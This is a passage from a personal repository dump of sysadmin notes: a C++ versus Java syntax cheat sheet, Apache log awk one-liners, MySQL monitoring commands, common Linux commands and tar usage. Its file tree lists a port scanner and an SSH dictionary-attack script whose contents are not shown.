├── README.md
├── cheatsheet
│   └── syntax-differences-java-c++.md
├── database
│   ├── cookielog_analysis.sh
│   └── mysql_monitor.sh
├── linux
│   ├── 20-sysadmin-commands.md
│   ├── basic_command.md
│   ├── compress_extract_files.md
│   ├── install-pytorch-on-palmetto.md
│   ├── install_cuda10.txt
│   ├── nmap-cheat-sheet.md
│   ├── ping_ok.sh
│   └── terminal-hotkeys.md
├── monitor
│   ├── IO.sh
│   ├── README.md
│   ├── awk.sh
│   ├── cpu.sh
│   ├── disk.sh
│   ├── isDDOS.sh
│   ├── mem_usage.sh
│   ├── monitor_system.sh
│   ├── network.sh
│   ├── nmap-cheat-sheet.md
│   ├── performance_tool.sh
│   └── process.sh
├── python
│   ├── README.md
│   ├── fourier-transforms
│   │   ├── FFT-Tutorial.ipynb
│   │   ├── FFT-Tutorial.py
│   │   ├── README.md
│   │   └── Vertikale_Netzlast_2013.csv
│   ├── images
│   │   ├── FFT.png
│   │   ├── VerticalGridLoadGermany2013-FFT.png
│   │   └── VerticalGridLoadGermany2013.png
│   ├── machine-learning
│   │   ├── README.md
│   │   ├── computeReceptiveField.py
│   │   └── split_dataset.py
│   ├── noise-reduction
│   │   ├── README.md
│   │   └── demo_filter_signal.py
│   ├── portscan.py
│   ├── pySorting
│   │   ├── README.md
│   │   ├── demo.py
│   │   ├── images
│   │   │   ├── Heapsort.gif
│   │   │   ├── Merge-sort.gif
│   │   │   ├── Selection_sort.gif
│   │   │   ├── Sorting_gnomesort.gif
│   │   │   ├── Sorting_quicksort.gif
│   │   │   ├── Sorting_shaker_sort.gif
│   │   │   ├── Sorting_shellsort.gif
│   │   │   ├── bubble-sort.gif
│   │   │   └── insert-sort.gif
│   │   └── pySorting.py
│   ├── run-length-encoding
│   │   ├── ThresholdingAlgo.gif
│   │   ├── ThresholdingAlgo.py
│   │   └── run-length-encoding.md
│   └── ssh-dictionary-attack.py
└── sed-awk
    ├── README.md
    ├── awk-workflow.png
    ├── awk_soup
    ├── awk_tutorial.md
    ├── items.txt
    ├── sed_tutorial.md
    └── titanic.txt
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

My collection of useful scripts, automate all the things!

- [Linux](#linux)
- [Python](#python)
- [Cheatsheet](#cheatsheet)
- [Sed/Awk](#sedawk)
- [Monitor](#monitor)
- [Network](#network)
- [Database](#database)
- [Tools](#tools)
- [Resources](#resources)


## Linux
- [compress and extract files](linux/compress_extract_files.md)
- [bash-guide, a guide to learn bash](https://github.com/Idnan/bash-guide)
- [basic commands](linux/basic_command.md)
- [terminal-hotkeys](./linux/terminal-hotkeys.md)
- [cheat allows you to create and view interactive cheatsheets on the command-line](https://github.com/chrisallenlane/cheat)
- [install pytorch on palmetto](linux/install-pytorch-on-palmetto.md)
- [Installing CUDA 10 on Ubuntu 18.04](linux/install_cuda10.txt)


## Python
- [Google Drive Download Python Script](https://github.com/matthuisman/gdrivedl)
- [Visualize code execution](https://pythontutor.com/)
- [Comprehensive Python Cheatsheet](https://github.com/gto76/python-cheatsheet)
- [dynamic-firmware-analysis](https://github.com/secjey/dynamic-firmware-analysis)
- [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit)
- [The most useful python snippets](https://github.com/progrmoiz/python-snippets)
- [More scripts](./python/)

## Cheatsheet
- [Markdown](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)
- [C++ vs Java](./cheatsheet/syntax-differences-java-c++.md)


## Sed/Awk
- [Sed Tutorial](sed-awk/sed_tutorial.md)
- [Awk Tutorial](sed-awk/awk_tutorial.md)
- [Awk Soup](sed-awk/awk_soup)


## Monitor
- [CPU](monitor/cpu.sh)
- [Memory](monitor/mem_usage.sh)
- [Disk](monitor/disk.sh)
- [Process](monitor/process.sh)
- [Network](monitor/network.sh)
- [isDDOS](monitor/isDDOS.sh)
- [IO](monitor/IO.sh)
- [system awk](monitor/awk.sh)
- 
[monitor system](monitor/monitor_system.sh)
- [performance tool](monitor/performance_tool.sh)
- [htop](https://hisham.hm/htop/)
- [hardinfo, system profiler and benchmark tool for Linux systems](https://github.com/lpereira/hardinfo)
- [i7z, a better i7 reporting tool for Linux](https://github.com/ajaiantilal/i7z)
- [screenFetch, fetches system/theme information in terminal for Linux desktop screenshots](https://github.com/KittyKatt/screenFetch)
- findmnt, find a filesystem
- iotop, simple top-like I/O monitor
- [Ncdu is a disk usage analyzer](https://dev.yorhel.nl/ncdu)
- atop, AT Computing's system & process monitor
- [Glances is a cross-platform system monitoring tool written in Python](https://nicolargo.github.io/glances/)
- [bwm-ng, a small and simple console-based live network and disk io bandwidth monitor](https://github.com/vgropp/bwm-ng)
- [cpustat, high frequency performance measurements for Linux](https://github.com/uber-common/cpustat)
- [psensor, a graphical temperature monitoring application](https://wpitchoune.net/psensor/)
- [lshw is a small tool to provide detailed information on the hardware configuration of the machine](https://github.com/lyonel/lshw)
- pidstat, report statistics for Linux tasks


## Network
- [nmap cheat sheet](./linux/nmap-cheat-sheet.md)
- nload, displays the current network usage
- [nethogs, Linux 'net top' tool](https://github.com/raboof/nethogs)
- [bmon, bandwidth monitor and rate estimator](https://github.com/tgraf/bmon)
- arpwatch, a computer software tool for monitoring Address Resolution Protocol traffic on a computer network
- [iptraf, IP network monitoring software](http://iptraf.seul.org)


## Database
- [mysql monitor](./database/mysql_monitor.sh)
- [cookielog analysis](./database/cookielog_analysis.sh)
- [mycli: a Terminal Client for MySQL with AutoCompletion and Syntax
Highlighting](https://github.com/dbcli/mycli)


## Tools
- [use vim as IDE](https://github.com/yangyangwithgnu/use_vim_as_ide)
- [Text-mode interface for git](https://github.com/jonas/tig)
- [jq is a lightweight and flexible command-line JSON processor](https://stedolan.github.io/jq/)
- [ShellCheck, a static analysis tool for shell scripts](https://github.com/koalaman/shellcheck)
- [yapf: a formatter for Python files](https://github.com/google/yapf)
- [Mosh: the mobile shell](https://github.com/mobile-shell/mosh)
- [fzf is a general-purpose command-line fuzzy finder](https://github.com/junegunn/fzf)
- [PathPicker presents you with a nice UI to select which files you're interested in](https://github.com/facebook/PathPicker)
- [Axel Download Accelerator](http://axel.alioth.debian.org/)
- [lrzsz, automate ZModem transfers](https://github.com/mmastrac/iterm2-zmodem)
- [cloc, Count Lines of Code](https://github.com/AlDanial/cloc)
- [ccache, a fast C/C++ compiler cache](https://ccache.samba.org/)
- [tmux, a terminal multiplexer](https://tmux.github.io/)
- [Neovim, literally the future of vim](https://neovim.io/)
- scriptreplay, play back typescripts using timing information
- [thefuck, magnificent app which corrects your previous console command](https://github.com/nvbn/thefuck)
- [you-get, dumb downloader that scrapes the web](https://github.com/soimort/you-get)
- [Anbox is a container-based approach to boot a full Android system on a regular GNU/Linux system](https://github.com/anbox/anbox)
- [getopts, parse command line in bash](http://wiki.bash-hackers.org/howto/getopts_tutorial)
- [mps-youtube, terminal based YouTube player and downloader](https://github.com/mps-youtube/mps-youtube)
- [arbtt is a cross-platform, completely automatic time tracker](https://arbtt.nomeata.de/#what)
- [tldr, simplified and community-driven man
pages](https://github.com/tldr-pages/tldr)
- [FIGlet is a program for making large letters out of ordinary text](http://www.figlet.org/)
- [Graphviz, turns text descriptions into graphs](http://www.graphviz.org/)
- [Pandoc, a universal document converter](http://pandoc.org/)
- [http-server, a simple zero-configuration command-line http server](https://github.com/indexzero/http-server)
- [oh-my-zsh, a delightful community-driven framework for managing your zsh configuration](https://github.com/robbyrussell/oh-my-zsh)
- [Ag: a code-searching tool similar to ack, but faster](https://github.com/ggreer/the_silver_searcher)


## Resources
- [A curated list of awesome Shell frameworks, libraries and software](https://github.com/uhub/awesome-shell)
- [A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php](https://github.com/alebcay/awesome-shell)
- [Use your OS X terminal shell to do awesome things](https://github.com/herrbischoff/awesome-osx-command-line)
- [A set of vim, zsh, git, and tmux configuration files](https://github.com/int32bit/dotfiles)
- [Curated list of awesome lists](https://github.com/sindresorhus/awesome)
--------------------------------------------------------------------------------
/cheatsheet/syntax-differences-java-c++.md:
--------------------------------------------------------------------------------

# C++ and Java Syntax Differences Cheat Sheet


## OOP

> nullptr vs.
null

- C++
```c++
int *x = nullptr; // initialize pointer to nullptr
```

- Java
```java
// the compiler will catch the use of uninitialized references, but if you
// need to initialize a reference so it's known to be invalid, assign null
myClass x = null;
```

> Object declarations

- C++
```c++
myClass x;                // on the stack

myClass *x = new myClass; // or on the heap
```

- Java
```java
// always allocated on the heap (also, always need parens for constructor)
myClass x = new myClass();
```

> Accessing fields of objects

- C++
```c++
myClass x;
x.my_field; // if you're using a stack-based object, you access its fields with a dot
// but you use the arrow operator (->) to access fields through a pointer
myClass *p = new myClass;
p->my_field; // ok
```

- Java
```java
// always work with references (similar to pointers -- see the next entry), so always use a dot:
myClass x = new myClass();
x.my_field; // ok
```

> References vs. pointers

- C++
```c++
// references cannot be reseated after initialization; use pointers for more flexibility
int bar = 7, qux = 6;
int& foo = bar;
```

- Java
```java
// references are mutable and store addresses only to objects; there are no raw pointers
myClass x;
x.foo(); // error, x is a null "pointer"

// note that you always use . to access a field
```

> Inheritance

- C++
```c++
class Foo : public Bar
{ ... };
```

- Java
```java
class Foo extends Bar
{ ...
}
```

> Protection levels

- C++
```c++
public:
    void foo();
    void bar();
```

- Java
```java
public void foo();
public void bar();
```

> Virtual functions

- C++
```c++
virtual int foo(); // or, non-virtually as simply int foo();
```

- Java
```java
// functions are virtual by default; use final to prevent overriding
int foo(); // or, final int foo();
```

> Abstract classes

- C++
```c++
// just need to include a pure virtual function
class Bar { public: virtual void foo() = 0; };
```

- Java
```java
// syntax allows you to be explicit!
abstract class Bar { public abstract void foo(); }

// or you might even want to specify an interface
interface Bar { public void foo(); }

// and later, have a class implement the interface:
class Chocolate implements Bar
{
    public void foo() { /* do something */ }
}
```

## ArrayList

- C++
```c++
vector<int> v;
v.push_back(10);
v.pop_back();
v.size();
v.empty();
v.at(0)/v[0];


vector<int> v {1, 2, 3, 4};
// or
vector<int> v = {1, 2, 3, 4};
```

- Java
```java
List<Integer> v = new ArrayList<>();
v.add(10);
v.get(0);     // access an item
v.set(0, 20); // change an item
v.remove(0);  // remove an item
v.size();
v.clear();

// Array
String[] optypes = new String[]{"A", "B", "C"};

// List
List<Integer> v =
    new ArrayList<>(Arrays.asList(5, 4, 3, 2, 1));

List<Integer> copy = new ArrayList<>(origin); // create from an existing list (clone)
```

> Sort / Reverse

- C++
```c++
sort/reverse(arr, arr+n);
sort/reverse(arr, arr+n, comp);
sort/reverse(v.begin(), v.end());
```

- Java
```java
Arrays.sort(arr);
Collections.sort/reverse(list);
Collections.sort(list, Collections.reverseOrder());
Collections.sort(list, new MyComparator());

class MyComparator implements Comparator<MyClass> {

    public int compare(MyClass a, MyClass b) { return a.val - b.val; }

}
```

## Map

- C++
```c++
// unordered_map / map
unordered_map<string, string> u;
// add two new entries to the unordered_map
u["BLACK"] = "#000000";
u["WHITE"] = "#FFFFFF";
for( const auto& [key, value] : u ) cout << key << ": " << value << "\n";
u.empty();
u.begin() / u.end();
if (u.find("RED") != u.end()) { /* do something */ }
u.erase("RED");
u.clear();
```

- Java
```java
// HashMap gives you an unsorted, unordered, non-synchronized Map
Map<String, String> u = new HashMap<>();
u.put("BLACK", "#000000");
u.put("WHITE", "#FFFFFF");
u.get("RED");    // access an item
u.remove("RED"); // remove an item
u.size();
u.clear();

// Print keys
for (String i : u.keySet()) {
    System.out.println(i + " value: " + u.get(i));
}

// Print values
for (String i : u.values()) {
    System.out.println(i);
}
```

`LinkedHashMap` extends `HashMap`. It maintains a linked list of the entries in the map, in the order in which they were inserted. This allows insertion-order iteration over the map.
```java
// insertion order is maintained here
Map<String, String> lmap = new LinkedHashMap<>();
```

A `TreeMap` is a `Map` that maintains its entries in ascending order, sorted according to the keys' natural ordering, or according to a Comparator supplied to the `TreeMap` constructor.
```java
Map<String, String> tMap = new TreeMap<>();
```

> Summary

- A `Map` is a collection of key-value pair (associative) objects.
- `HashMap` allows one null key; values can be null or duplicated, but keys have to be unique.
- Iteration order is not constant in the case of `HashMap`.
- When we need to maintain insertion order while iterating, we should use `LinkedHashMap`.
- `LinkedHashMap` provides all the same methods as `HashMap`.
- `LinkedHashMap` is not thread safe.
- `TreeMap` is a sorted collection, ordered either by natural ordering or by a custom ordering from a comparator.


## Set

- C++
```c++
// unordered_set/set
// empty() / begin() / end() / find() / insert() / erase() / clear()
```

- Java
```java
HashSet<String> cars = new HashSet<>();
cars.add("BMW");
cars.add("Ford");
cars.contains("Mazda"); // check if an item exists
cars.remove("Volvo");   // remove an item
cars.clear();
cars.size();

for (String i : cars) {
    System.out.println(i);
}
```

> Differences Between HashSet, LinkedHashSet and TreeSet In Java

- `HashSet` uses `HashMap` internally to store its elements; it doesn't maintain any order of elements.
- `LinkedHashSet` uses `LinkedHashMap` internally to store its elements; it maintains insertion order of elements.
- `TreeSet` uses `TreeMap` internally to store its elements; it orders the elements according to the supplied Comparator.
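The ordering differences above are easy to see side by side; a minimal sketch (the class and element names are arbitrary, and `HashSet` is omitted because its iteration order is unspecified):

```java
import java.util.LinkedHashSet;
import java.util.Set;
import java.util.TreeSet;

public class SetOrderDemo {
    public static void main(String[] args) {
        String[] items = {"pear", "apple", "mango", "banana"};

        Set<String> linked = new LinkedHashSet<>(); // keeps insertion order
        Set<String> tree = new TreeSet<>();         // keeps sorted (natural) order

        for (String s : items) {
            linked.add(s);
            tree.add(s);
        }

        System.out.println(linked); // [pear, apple, mango, banana]
        System.out.println(tree);   // [apple, banana, mango, pear]
    }
}
```

Swapping one `Set` implementation for another only changes iteration order, not the rest of the code, since all three implement the same interface.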

> https://home.csulb.edu/~pnguyen/cecs277/lecnotes/hashtree.pdf


## LinkedList

- C++
```c++
// list
// begin() / end() / front() / back() / push_front() / pop_front() / push_back() / pop_back()
// insert() / erase(iter) / remove(val)
```

- Java

The `LinkedList` class has all of the same methods as the `ArrayList` class because they both implement the `List` interface. `ArrayList` keeps a regular array inside it; in a `LinkedList`, each node has a link to the next node in the list.

```java
LinkedList<String> cars = new LinkedList<>();
cars.add("Volvo");
cars.add("BMW");
cars.addFirst("Mazda"); // add an item to the beginning of the list
cars.addLast("Ford");   // add an item to the end of the list
cars.removeFirst();     // remove an item from the beginning of the list
cars.removeLast();      // remove an item from the end of the list
cars.getFirst();        // get the item at the beginning of the list
cars.getLast();         // get the item at the end of the list
```


## String

- C++
```c++
// begin() / end() / size() / empty()
// operator[] / back() / front() / += / push_back() / pop_back() / insert / erase(str.begin()+9)
// str.find(':') == string::npos
// isalpha / isdigit

istringstream iss(str);
string word;
while (iss >> word) {
    cout << word << endl;
}

istringstream input;
input.str("a;b;c;d");
for (string line; getline(input, line, ';'); ) {
    cout << line << endl;
}
```

- Java
```java
String myStr = "Hello";
char result = myStr.charAt(0);

String myStr1 = "Hello";
String myStr2 = "Hello";
System.out.println(myStr1.compareTo(myStr2)); // returns 0 because they are equal
equals(); // Compares two strings.
// Returns true if the strings are equal, and false if not

endsWith();    // checks whether a string ends with the specified character(s)
startsWith();  // checks whether a string starts with specified characters
toCharArray(); // converts this string to a new character array, char[]
toLowerCase(); // converts a string to lower case letters
toUpperCase(); // converts a string to upper case letters
isEmpty();     // checks whether a string is empty or not
```

## Queue

- C++
```c++
// queue
queue<int> q;
q.push(10);
q.pop();
q.front();

// priority_queue: empty() / top() / push() / pop()
```

- Java
```java
Queue<String> queue = new LinkedList<>();
// or
Queue<String> queue = new PriorityQueue<>();

// access via the enhanced for-loop
for (String element : queue) {
    // do something with each element
}

// access via Iterator
Iterator<String> iterator = queue.iterator();
while (iterator.hasNext()) {
    String element = iterator.next();
}

// Add an element to the Queue
// add() and offer() differ in how they behave if the Queue is full
queue.add("element 1");   // throws an exception if full
queue.offer("element 2"); // whereas offer() just returns false

// Take an element from the Queue; remove() and poll() differ if the Queue is empty.
String element2 = queue.remove(); // throws an exception if the Queue is empty
String element1 = queue.poll();   // returns null if empty

// Peek at the Queue, without taking the element out of the Queue
String firstElement = queue.element(); // if empty, throws an exception
String firstOrNull = queue.peek();     // returns null if empty

queue.clear();   // remove all elements from the Queue
queue.size();    // get the Queue size
queue.isEmpty();

boolean containsMazda = queue.contains("Mazda"); // check if the Queue contains an element
```

## Stack

- C++
```c++
stack<int> s;
s.push(10);
s.pop();
s.top();
s.size();
s.empty();
```

- Java
```java
Stack<String> stack = new Stack<>();
stack.push("1");
String topElement = stack.pop();
String peeked = stack.peek(); // peek at the top element of the Stack
int size = stack.size();
stack.empty();

Iterator<String> iterator = stack.iterator();
while (iterator.hasNext()) {
    String value = iterator.next();
}
```
--------------------------------------------------------------------------------
/database/cookielog_analysis.sh:
--------------------------------------------------------------------------------
# Top 20 client IPs by request count in the Apache cookie log
cat cookielog | awk '{ a[$1] += 1; } END { for(i in a) printf("%d, %s\n", a[i], i ); }' | sort -n | tail -20

# List the URLs that returned 404 in the Apache access log
awk '$11 == 404 {print $8}' access_log | sort | uniq -c | sort -rn | head

# IPs with more than 20 requests, with their counts; change $1 to the URL field ($9) to count requests per URL
cat access_log | awk '{print $1}' | sort | uniq -c | sort -n | awk '{ if ($1 > 20) print $1,$2}'

# Average response time per URL
cat cookielog | awk '{ a[$6] += 1; b[$6] += $11; } END { for(i in a) printf("%d, %d, %s\n", a[i], b[i]/a[i], i ); }' | sort -n | tail -20


# Print each new client IP as it first appears in the Apache access log
tail -f access.log |
awk -W interactive '!x[$1]++ {print $1}'

# URLs requested by a given IP today, with request counts:
cat access.log | grep "10.0.21.17" | awk '{print $7}' | sort | uniq -c | sort -nr


# Find the busiest time-of-day window in the log
awk '{print $4}' access.log | grep "26/Mar/2012" |cut -c 20-50|sort|uniq -c|sort -nr|head

# Count the requests for a given day
cat access_log|grep '12/Nov/2012'|grep "******.htm"|wc -l

# List URLs whose response time exceeds 30ms
cat access_log|awk '($NF > 30){print $7}'|sort -n|uniq -c|sort -nr|head -20

# List .php URLs whose response time exceeds 60ms, with occurrence counts
cat access_log |awk '($NF > 60 && $7~/\.php/){print $7}'|sort -n|uniq -c|sort -nr|head -100

# URL request counts after excluding search-engine crawlers
sed "/Baiduspider/d;/Googlebot/d;/Sogou web spider/d;" xxx.log|awk -F' ' '{print $7}'|sort | uniq -c | sort -k1,2 -nr

# Count unique visitors (UV) of the /index.html page
grep "/index.html" access.log | cut -d " " -f 4| sort | uniq | wc -l
--------------------------------------------------------------------------------
/database/mysql_monitor.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Check whether the MySQL server is up and serving
mysqladmin -u sky -ppwd -h localhost ping

# Get a few current MySQL status values
mysqladmin -u sky -ppwd -h localhost status

# Get the current connection info
mysqladmin -u sky -ppwd -h localhost processlist

# Get the current number of connections per host
mysql -u root -p123456 -BNe "select host,count(host) from processlist group by host;" information_schema

# Show the MySQL uptime
mysql -e"SHOW STATUS LIKE '%uptime%'"|awk '/ptime/{ calc = $NF / 3600;print $(NF-1), calc"Hour" }'

# Check the size of each database (MB)
mysql -u root -p123456 -e 'select table_schema,round(sum(data_length+index_length)/1024/1024,4) from information_schema.tables group by table_schema;'

# List the columns of a table (fill in the user, password, and table name)
mysql -u --password= -e "SHOW COLUMNS FROM " | awk '{print $1}' | tr "\n" "," | sed 's/,$//g'

# Run a SQL script
mysql -u user-name -ppassword < script.sql

# Export data with mysqldump
mysqldump -uroot -T/tmp/mysqldump test test_outfile --fields-enclosed-by=\" --fields-terminated-by=,

# Import data into MySQL
mysqlimport --user=name --password=pwd test --fields-enclosed-by=\" --fields-terminated-by=, /tmp/test_outfile.txt
LOAD DATA INFILE '/tmp/test_outfile.txt' INTO TABLE test_outfile FIELDS TERMINATED BY ',' ENCLOSED BY '"';

# Monitor the MySQL processes
ps -ef | grep "mysqld_safe" | grep -v "grep"
ps -ef | grep "mysqld" | grep -v "mysqld_safe"| grep -v "grep"


# Check the current database status
mysql -u root -p123456 -e 'show status'


# mysqlcheck can check, repair, analyze, and optimize the tables in a MySQL server
mysqlcheck -u root -p123456 --all-databases

# MySQL QPS: QPS = Questions (or Queries) / Seconds
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Questions"'
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Queries"'

# Key buffer hit ratios: key_buffer_read_hits = (1 - Key_reads / Key_read_requests) * 100%; key_buffer_write_hits = (1 - Key_writes / Key_write_requests) * 100%
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Key%"'

# InnoDB buffer hit ratio: innodb_buffer_read_hits = (1 - Innodb_buffer_pool_reads / Innodb_buffer_pool_read_requests) * 100%
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Innodb_buffer_pool_read%"'

# Query cache hit ratio: Query_cache_hits = (Qcache_hits / (Qcache_hits + Qcache_inserts)) * 100%
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Qcache%"'

# Table cache status
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Open%"'

# Thread cache hit ratio: Thread_cache_hits = (1 - Threads_created / Connections) * 100%; normally it should be above 90% to be considered healthy
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Thread%"'

# Lock status: covers both table locks and row locks; the status variables give the total lock count, how many times locks made other threads wait, and the lock wait times
mysql \
  -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "%lock%"'

# Replication delay (run on the slave node)
mysql -u root -p123456 -e 'SHOW SLAVE STATUS'

# Tmp table status: mainly used to monitor whether MySQL creates too many temporary tables, and whether temporary tables grow so large that they must be swapped out of memory to disk files
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Created_tmp%"'

# Binlog cache usage: the binlog cache holds binlog data that has not yet been written to disk
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Binlog_cache%"'

# Innodb_log_waits: this status variable directly reflects the number of waits caused by insufficient InnoDB log buffer space
mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Innodb_log_waits"'
--------------------------------------------------------------------------------
/linux/20-sysadmin-commands.md:
--------------------------------------------------------------------------------
# 20 Linux commands every sysadmin should know

> If your application isn't working - or you're just looking for more information - these 20 commands will come in handy.


## 1. curl

It is useful for determining if your application can reach another service, such as a database, or checking if your service is healthy.

The **-I** option shows the header information and the **-s** option silences the response body.

```sh
$ curl -I -s database:27017
HTTP/1.0 200 OK

$ curl -I -s https://opensource.com
HTTP/1.1 200 OK
```

## 2. python -m json.tool / jq

Sometimes, you want to pretty-print the JSON output to find a specific entry. Python has a built-in JSON library that can help with this.

```sh
$ cat test.json
{"title":"Person","type":"object","properties":{"firstName":{"type":"string"},"lastName":{"type":"string"},"age":{"description":"Age in years","type":"integer","minimum":0}},"required":["firstName","lastName"]}
```

To use the Python library, pipe the output to Python with the -m (module) option.

```sh
$ cat test.json | python -m json.tool
{
    "properties": {
        "age": {
            "description": "Age in years",
            "minimum": 0,
            "type": "integer"
        },
        "firstName": {
            "type": "string"
        },
        "lastName": {
            "type": "string"
        }
    },
    "required": [
        "firstName",
        "lastName"
    ],
    "title": "Person",
    "type": "object"
}
```

## 3. ls

lists files in a directory

```sh
$ ./myapp
bash: ./myapp: Permission denied
$ ls -l myapp
-rw-r--r--. 1 root root 33 Jul 21 18:36 myapp
```

## 4. tail

displays the last part of a file

```sh
# -f indicates the "follow", which outputs the log lines as they are written to the file
$ tail -f /var/log/httpd/access_log

# see the last 100 lines of the file
$ tail -n 100 /var/log/httpd/access_log
```

## 5. cat

```sh
$ cat requirements.txt
flask
flask_pymongo
```

## 6. grep

**grep** searches file patterns.

```sh
$ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start
01-Jul-2017 18:03:47.542 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 681 ms
```

## 7. ps

shows process status.
```sh
$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  2 18:55 ?        00:00:02 /docker-java-home/jre/bi
root        59     0  0 18:55 pts/0    00:00:00 /bin/sh
root        75    59  0 18:57 pts/0    00:00:00 ps -ef

$ ps -ef | grep tomcat
root         1     0  1 18:55 ?
00:00:02 /docker-java-home/jre/bi
```

## 8. env

allows you to set or print the environment variables.
```sh
$ env
PYTHON_PIP_VERSION=9.0.1
HOME=/root
DB_NAME=test
PATH=/usr/local/bin:/usr/local/sbin
LANG=C.UTF-8
PYTHON_VERSION=3.4.6
PWD=/
DB_URI=mongodb://database:27017/test
```

## 9. top

displays and updates sorted process information. While it runs, press the "c" key to see the full command line and work out whether the process is your application.

## 10. netstat

shows the network status. This command shows network ports in use and their incoming connections.

## 11. ip address

## 12. lsof

lists the open files associated with your application. In Linux, almost any interaction with the system is treated like a file. As a result, if your application writes to a file or opens a network connection, **lsof** will reflect that interaction as a file.

```sh
$ lsof -i tcp:80
$ lsof -p 18311
```

The name of the open file in the list of open files helps pinpoint the origin of the process, specifically Apache.

## 13. df

displays free disk space. The **-h** option prints out the information in human-readable format.

## 14. du

To retrieve more detailed information about which files use the disk space in a directory, you can use the **du** command. Use the **-h** (human-readable) option together with the **-s** option for the total size.

```sh
$ du -sh /var/log/*
1.8M  /var/log/anaconda
384K  /var/log/audit
4.0K  /var/log/boot.log
0     /var/log/chrony
4.0K  /var/log/cron
4.0K  /var/log/maillog
64K   /var/log/messages
```

## 15. id

To check the user running the application, use the id command to return the user identity.
To check your user and group, issue the id command and notice that you are running as the "vagrant" user in the "vagrant" group.

```sh
$ yum -y install httpd
Loaded plugins: fastestmirror
You need to be root to perform this command.
$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

## 16. chmod

```sh
$ chmod +x test.sh
[vagrant@localhost ~]$ ls -l
total 4
-rwxrwxr-x. 1 vagrant vagrant 34 Jul 11 02:17 test.sh
```

## 17. dig/nslookup

```sh
$ nslookup mydatabase
Server:    10.0.2.3
Address:   10.0.2.3#53

** server can't find mydatabase: NXDOMAIN
```

Using nslookup shows that mydatabase can't be resolved. Trying to resolve with dig yields the same result.

```sh
$ dig mydatabase

; <<>> DiG 9.9.4-RedHat-9.9.4-50.el7_3.1 <<>> mydatabase
;; global options: +cmd
;; connection timed out; no servers could be reached
```

## 18. iptables

**iptables** blocks or allows traffic on a Linux host, similar to a network firewall. This tool may prevent certain applications from receiving or transmitting requests.

```sh
$ iptables -S
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --sport 53 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT
```

## 19. sestatus

You usually find SELinux (a Linux security module) enforced on an application host managed by an enterprise. SELinux provides least-privilege access to processes running on the host, preventing potentially malicious processes from accessing important files on the system.
224 | 225 | ```sh 226 | $ sestatus 227 | SELinux status: enabled 228 | SELinuxfs mount: /sys/fs/selinux 229 | SELinux root directory: /etc/selinux 230 | Loaded policy name: targeted 231 | Current mode: enforcing 232 | Mode from config file: enforcing 233 | Policy MLS status: enabled 234 | Policy deny_unknown status: allowed 235 | Max kernel policy version: 28 236 | ``` 237 | 238 | ## 20. history 239 | displays your shell command history, numbered. 240 | ```sh 241 | $ history 242 | 1 clear 243 | 2 df -h 244 | 3 du 245 | ``` 246 | 247 | 248 | ## Reference 249 | 250 | - [20 Linux commands every sysadmin should know](https://opensource.com/article/17/7/20-sysadmin-commands) 251 | -------------------------------------------------------------------------------- /linux/basic_command.md: -------------------------------------------------------------------------------- 1 | # Basic Commands 2 | 3 | ### du 4 | estimate file space usage 5 | 6 | ``` 7 | # skip all files and subdirectories ending in .o (including the file .o itself) 8 | $ du --exclude='*.o' 9 | 10 | # summarize disk usage of the top 10 largest files, not including hidden files 11 | $ du -sh * | sort -rh | head -10 12 | 13 | # summarize disk usage of hidden files and directories 14 | $ du -sh .* 15 | ``` 16 | 17 | ### ln 18 | make links between files 19 | 20 | SYNOPSIS: `ln [OPTION]... TARGET LINK_NAME` 21 | 22 | - ln, by default, creates a hard link just like *link* does. A *link* is an entry in your file system which connects a filename to the actual bytes of data on disk. What the *link* command does is allow us to manually create a link to file data that already exists. 23 | The important thing to realize is that we did not make a copy of this data. Both filenames point to the same bytes of data on the disk.
24 | 25 | ``` 26 | $ ln file1.txt file2.txt 27 | $ link file1.txt file2.txt 28 | ``` 29 | 30 | - Symbolic links, sometimes called soft links, link to another filename rather than directly to the data. In this example, 31 | file2.txt points to file1.txt, which in turn points to the data of the file. 32 | 33 | ``` 34 | $ ln -s file1.txt file2.txt 35 | ``` 36 | 37 | Note: unlike hard links, removing the file (or directory) that a symlink points to will break the link. 38 | 39 | 40 | ### bc 41 | Hexadecimal and Decimal Conversion 42 | 43 | ```sh 44 | # To convert to decimal, set ibase to 16 45 | echo "ibase=16; hex-number"|bc 46 | echo "ibase=16; FFF"|bc 47 | 4095 48 | 49 | # To convert to hexadecimal, set obase to 16 50 | echo "obase=16; decimal-number"|bc 51 | echo "obase=16; 10"|bc 52 | A 53 | ``` 54 | -------------------------------------------------------------------------------- /linux/compress_extract_files.md: -------------------------------------------------------------------------------- 1 | 2 | ## Compress and Extract Files Using the tar Command on Linux 3 | 4 | ### Compress an Entire Directory or a Single File 5 | 6 | ``` 7 | tar -czvf name-of-archive.tar.gz /path/to/directory-or-file 8 | ``` 9 | 10 | - c: Create an archive. 11 | - z: Compress the archive with gzip. 12 | - v: Display progress in the terminal while creating the archive, also known as “verbose” 